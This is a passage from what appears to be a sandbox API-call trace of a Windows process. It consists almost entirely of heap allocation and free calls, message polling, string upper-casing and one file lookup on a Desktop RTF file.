Flags=0x0, Size=0x4) returned 0x2a72aa8 [0102.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0102.873] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0102.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0102.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0102.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0102.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.877] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0102.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0102.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.880] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/MdUrzCG7I8VQVwhMz8.rtf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 0x9a3b80 [0102.880] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0102.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0102.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.881] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0102.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.882] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.882] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.882] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0102.882] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.882] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.882] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.882] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.882] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0102.883] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.883] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: 